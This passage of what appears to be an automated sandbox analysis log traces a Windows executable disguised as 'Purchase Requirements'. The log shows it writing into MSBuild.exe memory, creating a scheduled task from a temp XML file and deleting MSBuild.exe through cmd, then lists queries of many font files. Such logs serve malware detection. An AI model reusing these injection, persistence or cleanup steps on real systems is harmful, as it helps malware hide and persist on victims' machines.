          Source: C:\Users\user\Desktop\Purchase Requirements.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
          Source: C:\Users\user\Desktop\Purchase Requirements.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
          Source: C:\Users\user\Desktop\Purchase Requirements.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: B42008
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UCnSWpQKXBXg' /XML 'C:\Users\user\AppData\Local\Temp\tmp47B.tmp'
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
          Source: explorer.exe, 00000008.00000000.728424722.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000008.00000000.731907032.0000000001080000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.731907032.0000000001080000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.731907032.0000000001080000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.731907032.0000000001080000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000008.00000000.715378228.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Users\user\Desktop\Purchase Requirements.exe VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Requirements.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
